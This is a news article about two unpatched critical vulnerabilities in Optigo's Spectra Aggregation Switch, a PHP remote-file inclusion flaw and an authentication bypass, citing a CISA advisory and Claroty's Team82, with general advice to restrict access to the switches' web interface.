Article Details

Two simple give-me-control security bugs found in Optigo network switches used in critical manufacturing. Poor use of PHP include() strikes again. Two trivial but critical security holes have been found in Optigo's Spectra Aggregation Switch, and so far no patch is available. The vulnerabilities, both with CVSS v4 severity scores of 9.3, can be abused by a remote attacker to inject malware into the OT network management switches if they are running version 1.3.7 and earlier. According to the US government's Cybersecurity and Infrastructure Security Agency, aka CISA, Optigo's vulnerable switches can be easily compromised by an unauthenticated remote user. The agency also said the networking gear can be found in critical manufacturing settings, though to be honest, the hardware can be used for wiring up the network of any small or large building. The first flaw, CVE-2024-41925, is a PHP remote-file inclusion vulnerability affecting the web-based user interface for the switch. Once exploited, a remote attacker would be able to bypass authentication, move between directories on the equipment, and execute arbitrary code on the target. This also means the intruder needs to be able to reach the device's web interface to pull this off. The second, CVE-2024-45367, is an incomplete authentication process at the web server level on the Canadian manufacturer's kit. A remote attacker could simply get in without needing to use a password, CISA warns. Again, exploitation requires the miscreant to be able to reach the web interface. If that's accessible to the public internet somehow, that's not good; you need to cut off that access. If it's reachable from an internal network, you need to make sure whoever can reach that equipment is trusted and secure. There are no patches yet. Optigo hasn't responded to questions on the matter, though the manufacturer has issued a series of workarounds that should mitigate the vulnerabilities. It recommends the following: There are no signs that these vulnerabilities are being exploited at the moment, CISA said, though now the advisories are out, it could just be a matter of time before they are abused. The flaws were found and reported by the enterprise security shop Claroty's Team82, who had no comment at the time of publication.